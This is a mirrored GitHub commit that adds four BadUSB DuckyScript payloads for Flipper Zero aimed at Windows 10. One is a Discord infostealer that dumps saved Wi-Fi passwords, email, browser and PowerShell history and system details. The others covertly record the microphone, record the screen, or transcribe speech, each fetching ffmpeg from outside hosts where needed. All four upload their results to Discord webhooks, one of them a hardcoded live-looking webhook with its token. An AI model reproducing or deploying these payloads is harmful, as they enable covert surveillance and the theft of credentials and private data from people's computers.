mirror of
https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git
synced 2025-12-12 07:40:44 -08:00
Add files via upload
This commit is contained in:
beigeworm
24
OSINT/Discord-Infostealer.txt.txt
Normal file
24
OSINT/Discord-Infostealer.txt.txt
Normal file
@@ -0,0 +1,24 @@
|
||||
REM Title: Discord Infostealer
|
||||
REM Author: @beigeworm | https://github.com/beigeworm
|
||||
REM Description: Gather system information and send it to a discord webhook.
|
||||
REM Target: Windows 10
|
||||
|
||||
REM SETUP
|
||||
REM replace YOUR_WEBHOOK_HERE (below) with your discord webhook.
|
||||
|
||||
REM some setup for dukie script.
|
||||
DEFAULT_DELAY 100
|
||||
|
||||
GUI r
|
||||
DELAY 750
|
||||
|
||||
REM open powershell (add "-W Hidden" to hide the window).
|
||||
STRING powershell -NoP -NonI -Exec Bypass
|
||||
ENTER
|
||||
DELAY 5000
|
||||
|
||||
STRING $hookurl = "YOUR_WEBHOOK_HERE";$userInfo = Get-WmiObject -Class Win32_UserAccount ;$fullName = $($userInfo.FullName) ;$fullName = ("$fullName").TrimStart("");$email = GPRESULT -Z /USER $Env:username | Select-String -Pattern "([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})" -AllMatches ;$email = ("$email").Trim();$systemLocale = Get-WinSystemLocale;$systemLanguage = $systemLocale.Name;$userLanguageList = Get-WinUserLanguageList;$keyboardLayoutID = $userLanguageList[0].InputMethodTips[0];$computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content;$outssid="";$a=0;$ws=(netsh wlan show profiles) -replace ".*:\s+";foreach($s in $ws){if($a -gt 1 -And $s -NotMatch " policy " -And $s -ne "User profiles" -And $s -NotMatch "-----" -And $s -NotMatch "<None>" -And $s.length -gt 5){$ssid=$s.Trim();if($s -Match ":"){$ssid=$s.Split(":")[1].Trim()};$pw=(netsh wlan show profiles name=$ssid key=clear);$pass="None";foreach($p in $pw){if($p -Match "Key Content"){$pass=$p.Split(":")[1].Trim();$outssid+="SSID: $ssid : Password: $pass`n"}}}$a++;};$systemInfo = Get-WmiObject -Class Win32_OperatingSystem;$processorInfo = Get-WmiObject -Class Win32_Processor;$computerSystemInfo = Get-WmiObject -Class Win32_ComputerSystem;$userInfo = Get-WmiObject -Class Win32_UserAccount;$videocardinfo = Get-WmiObject Win32_VideoController;$Hddinfo = Get-WmiObject Win32_LogicalDisk | select DeviceID, VolumeName, FileSystem,@{Name="Size_GB";Expression={"{0:N1} GB" -f ($_.Size / 1Gb)}}, @{Name="FreeSpace_GB";Expression={"{0:N1} GB" -f ($_.FreeSpace / 1Gb)}}, @{Name="FreeSpace_percent";Expression={"{0:N1}%" -f ((100 / ($_.Size / $_.FreeSpace)))}} | Format-Table DeviceID, VolumeName,FileSystem,@{ Name="Size GB"; Expression={$_.Size_GB}; align="right"; }, @{ Name="FreeSpace GB"; Expression={$_.FreeSpace_GB}; align="right"; }, @{ Name="FreeSpace %"; Expression={$_.FreeSpace_percent}; align="right"; } ;$Hddinfo=($Hddinfo| Out-String) ;$Hddinfo = ("$Hddinfo").TrimEnd("");$RamInfo = Get-WmiObject Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | % { "{0:N1} GB" -f ($_.sum / 1GB)}
|
||||
STRING ;$users = "$($userInfo.Name)";$userString = "`nFull Name : $($userInfo.FullName)";$OSString = "$($systemInfo.Caption) $($systemInfo.OSArchitecture)";$systemString = "Processor : $($processorInfo.Name)";$systemString += "`nMemory : $RamInfo";$systemString += "`nGpu : $($videocardinfo.Name)";$systemString += "`nStorage : $Hddinfo";$infomessage = "``========================================================`nCurrent User : $env:USERNAME`nEmail Address : $email`nLanguage : $systemLanguage`nKeyboard Layout : $keyboardLayoutID`nOther Accounts : $users`nPublic IP : $computerPubIP`nCurrent OS : $OSString`nHardware Info`n--------------------------------------------------------`n$systemString``"
|
||||
STRING ;$COMDevices = Get-Wmiobject Win32_USBControllerDevice | ForEach-Object{[Wmi]($_.Dependent)} | Select-Object Name, DeviceID, Manufacturer | Sort-Object -Descending Name | Format-Table;$process=Get-WmiObject win32_process | select Handle, ProcessName, ExecutablePath, CommandLine;$service=Get-CimInstance -ClassName Win32_Service | select State,Name,StartName,PathName | Where-Object {$_.State -like 'Running'};$software=Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | where { $_.DisplayName -notlike $null } | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Sort-Object DisplayName | Format-Table -AutoSize;$drivers=Get-WmiObject Win32_PnPSignedDriver| where { $_.DeviceName -notlike $null } | select DeviceName, FriendlyName, DriverProviderName, DriverVersion;$Regex = '(http|https)://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?';$Path = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\History";$Value = Get-Content -Path $Path | Select-String -AllMatches $regex |% {($_.Matches).Value} |Sort -Unique;$Value | ForEach-Object {$Key = $_;if ($Key -match $Search){New-Object -TypeName PSObject -Property @{User = $env:UserName;Browser = 'chrome';DataType = 'history';Data = $_}}};$Regex2 = '(http|https)://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?';$Pathed = "$Env:USERPROFILE\AppData\Local\Microsoft/Edge/User Data/Default/History";$Value2 = Get-Content -Path $Pathed | Select-String -AllMatches $regex2 |% {($_.Matches).Value} |Sort -Unique;$Value2 | ForEach-Object {$Key = $_;if ($Key -match $Search){New-Object -TypeName PSObject -Property @{User = $env:UserName;Browser = 'chrome';DataType = 'history';Data = $_}}};$pshist = "$env:USERPROFILE\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt";$pshistory = Get-Content $pshist -raw;$RecentFiles = Get-ChildItem -Path $env:USERPROFILE -Recurse -File | Sort-Object LastWriteTime -Descending | Select-Object -First 100 FullName, LastWriteTime
|
||||
STRING ;$outpath = "$env:temp\systeminfo.txt";"--------------------- SYSTEM INFORMATION for $env:COMPUTERNAME -----------------------`n" | Out-File -FilePath $outpath -Encoding ASCII;"General Info `n $infomessage" | Out-File -FilePath $outpath -Encoding ASCII -Append;"Network Info `n -----------------------------------------------------------------------`n$outssid" | Out-File -FilePath $outpath -Encoding ASCII -Append;"USB Info `n -----------------------------------------------------------------------" | Out-File -FilePath $outpath -Encoding ASCII -Append;($COMDevices| Out-String) | Out-File -FilePath $outpath -Encoding ASCII -Append;"`n" | Out-File -FilePath $outpath -Encoding ASCII -Append;"SOFTWARE INFO `n ======================================================================" | Out-File -FilePath $outpath -Encoding ASCII -Append;"Installed Software `n -----------------------------------------------------------------------" | Out-File -FilePath $outpath -Encoding ASCII -Append;($software| Out-String) | Out-File -FilePath $outpath -Encoding ASCII -Append;"Processes `n -----------------------------------------------------------------------" | Out-File -FilePath $outpath -Encoding ASCII -Append;($process| Out-String) | Out-File -FilePath $outpath -Encoding ASCII -Append;"Services `n -----------------------------------------------------------------------" | Out-File -FilePath $outpath -Encoding ASCII -Append;($service| Out-String) | Out-File -FilePath $outpath -Encoding ASCII -Append;"Drivers `n -----------------------------------------------------------------------`n$drivers" | Out-File -FilePath $outpath -Encoding ASCII -Append;"`n" | Out-File -FilePath $outpath -Encoding ASCII -Append;"HISTORY INFO `n ====================================================================== `n" | Out-File -FilePath $outpath -Encoding ASCII -Append;"Browser History `n -----------------------------------------------------------------------" | Out-File -FilePath $outpath -Encoding ASCII -Append;($Value| Out-String) | Out-File -FilePath $outpath -Encoding ASCII -Append;($Value2| Out-String) | Out-File -FilePath $outpath -Encoding ASCII -Append;"Powershell History `n -----------------------------------------------------------------------" | Out-File -FilePath $outpath -Encoding ASCII -Append;($pshistory| Out-String) | Out-File -FilePath $outpath -Encoding ASCII -Append;"Recent Files `n -----------------------------------------------------------------------" | Out-File -FilePath $outpath -Encoding ASCII -Append;($RecentFiles | Out-String) | Out-File -FilePath $outpath -Encoding ASCII -Append;$jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = ":computer: ``System Information for $env:COMPUTERNAME`` :computer:"} | ConvertTo-Json;Invoke-RestMethod -Uri $hookurl -Method Post -ContentType "application/json" -Body $jsonsys;Sleep 1;$jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = "$infomessage"} | ConvertTo-Json;Invoke-RestMethod -Uri $hookurl -Method Post -ContentType "application/json" -Body $jsonsys;curl.exe -F file1=@"$outpath" $hookurl;Sleep 1;Remove-Item -Path $outpath -force;exit
|
||||
ENTER
|
||||
21
OSINT/Record-Mic-to-Discord.txt.txt
Normal file
21
OSINT/Record-Mic-to-Discord.txt.txt
Normal file
@@ -0,0 +1,21 @@
|
||||
REM Title: Record Mic To Discord
|
||||
REM Author: @beigeworm | https://github.com/beigeworm
|
||||
REM Description: record a 60 second audio file from the microphone and send to discord.
|
||||
REM Target: Windows 10
|
||||
|
||||
REM SETUP
|
||||
REM replace YOUR_WEBHOOK_HERE (below) with your discord webhook.
|
||||
|
||||
REM some setup for dukie script.
|
||||
DEFAULT_DELAY 100
|
||||
|
||||
GUI r
|
||||
DELAY 750
|
||||
|
||||
REM open powershell (add "-W Hidden" to hide the window).
|
||||
STRING powershell -NoP -NonI -Exec Bypass
|
||||
ENTER
|
||||
DELAY 5000
|
||||
|
||||
STRING $hookurl = 'YOUR_WEBHOOK_HERE';Function RecordAudio{param ([int[]]$t);$Path = "$env:Temp\ffmpeg.exe";If (!(Test-Path $Path)){$url = "http://beigenet.duckdns.org/files/Win10Tools/ffmpeg.exe";iwr -Uri $url -OutFile $Path};sleep 1;Add-Type '[Guid("D666063F-1587-4E43-81F1-B948E807363F"), InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]interface IMMDevice {int a(); int o();int GetId([MarshalAs(UnmanagedType.LPWStr)] out string id);}[Guid("A95664D2-9614-4F35-A746-DE8DB63617E6"), InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]interface IMMDeviceEnumerator {int f();int GetDefaultAudioEndpoint(int dataFlow, int role, out IMMDevice endpoint);}[ComImport, Guid("BCDE0395-E52F-467C-8E3D-C4579291692E")] class MMDeviceEnumeratorComObject { }public static string GetDefault (int direction) {var enumerator = new MMDeviceEnumeratorComObject() as IMMDeviceEnumerator;IMMDevice dev = null;Marshal.ThrowExceptionForHR(enumerator.GetDefaultAudioEndpoint(direction, 1, out dev));string id = null;Marshal.ThrowExceptionForHR(dev.GetId(out id));return id;}' -name audio -Namespace system;function getFriendlyName($id) {$reg = "HKLM:\SYSTEM\CurrentControlSet\Enum\SWD\MMDEVAPI\$id";return (get-ItemProperty $reg).FriendlyName};$id1 = [audio]::GetDefault(1);$MicName = "$(getFriendlyName $id1)"; Write-Output $MicName;$mp3Path = "$env:Temp\AudioClip.mp3";if ($t.Length -eq 0){$t = 10}.$env:Temp\ffmpeg.exe -f dshow -i audio="$MicName" -t $t -c:a libmp3lame -ar 44100 -b:a 128k -ac 1 $mp3Path;curl.exe -F file1=@"$mp3Path" $hookurl | Out-Null;sleep 1;rm -Path $mp3Path -Force}RecordAudio -t 60;exit
|
||||
ENTER
|
||||
21
OSINT/Record-Screen-to-Discord.txt.txt
Normal file
21
OSINT/Record-Screen-to-Discord.txt.txt
Normal file
@@ -0,0 +1,21 @@
|
||||
REM Title: Record Screen To Discord
|
||||
REM Author: @beigeworm | https://github.com/beigeworm
|
||||
REM Description: record a 30 second mkv file of the screen and send to discord.
|
||||
REM Target: Windows 10
|
||||
|
||||
REM SETUP
|
||||
REM replace YOUR_WEBHOOK_HERE (below) with your discord webhook.
|
||||
|
||||
REM some setup for dukie script.
|
||||
DEFAULT_DELAY 100
|
||||
|
||||
GUI r
|
||||
DELAY 750
|
||||
|
||||
REM open powershell (add "-W Hidden" to hide the window).
|
||||
STRING powershell -NoP -NonI -Exec Bypass
|
||||
ENTER
|
||||
DELAY 5000
|
||||
|
||||
STRING $hookurl = 'YOUR_WEBHOOK_HERE';Function RecordScreen{param ([int[]]$t);$jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = ":arrows_counterclockwise: ``Recording screen for $t seconds..`` :arrows_counterclockwise:"} | ConvertTo-Json ;Invoke-RestMethod -Uri $hookurl -Method Post -ContentType "application/json" -Body $jsonsys;$Path = "$env:Temp\ffmpeg.exe";If (!(Test-Path $Path)){$url = "https://cdn.discordapp.com/attachments/803285521908236328/1089995848223555764/ffmpeg.exe";iwr -Uri $url -OutFile $Path};sleep 1;$mkvPath = "$env:Temp\ScreenClip.mkv";if ($t.Length -eq 0){$t = 10};.$env:Temp\ffmpeg.exe -f gdigrab -t 10 -framerate 30 -i desktop $mkvPath;curl.exe -F file1=@"$mkvPath" $hookurl | Out-Null;sleep 1;rm -Path $mp3Path -Force}RecordScreen -t 30;exit
|
||||
ENTER
|
||||
21
OSINT/Speech-to-Discord.txt.txt
Normal file
21
OSINT/Speech-to-Discord.txt.txt
Normal file
@@ -0,0 +1,21 @@
|
||||
REM Title: Speech to Discord
|
||||
REM Author: @beigeworm | https://github.com/beigeworm
|
||||
REM Description: Write a transcript of audio from the mic and send to discord.
|
||||
REM Target: Windows 10
|
||||
|
||||
REM SETUP
|
||||
REM replace YOUR_WEBHOOK_HERE (below) with your discord webhook.
|
||||
|
||||
REM some setup for dukie script.
|
||||
DEFAULT_DELAY 100
|
||||
|
||||
GUI r
|
||||
DELAY 750
|
||||
|
||||
REM open powershell (add "-W Hidden" to hide the window).
|
||||
STRING powershell -NoP -NonI -Exec Bypass
|
||||
ENTER
|
||||
DELAY 5000
|
||||
|
||||
STRING Add-Type -AssemblyName System.Speech;$speech = New-Object System.Speech.Recognition.SpeechRecognitionEngine;$grammar = New-Object System.Speech.Recognition.DictationGrammar;$speech.LoadGrammar($grammar);$speech.SetInputToDefaultAudioDevice();while($true){$result = $speech.Recognize();if ($result) {$results = $result.Text;Write-Output $results;$dc = 'https://discord.com/api/webhooks/1176132406642757662/xCdVqng2X6cErTeiXkd8SO8tiu7oPJ9mOAUdDO9kcCHbM4xZGL6HUopf_adRv7DLeQQE';$Body = @{'username' = $env:COMPUTERNAME ; 'content' = $results};irm -ContentType 'Application/Json' -Uri $dc -Method Post -Body ($Body | ConvertTo-Json)}};exit
|
||||
ENTER
|
||||
Reference in New Issue
Block a user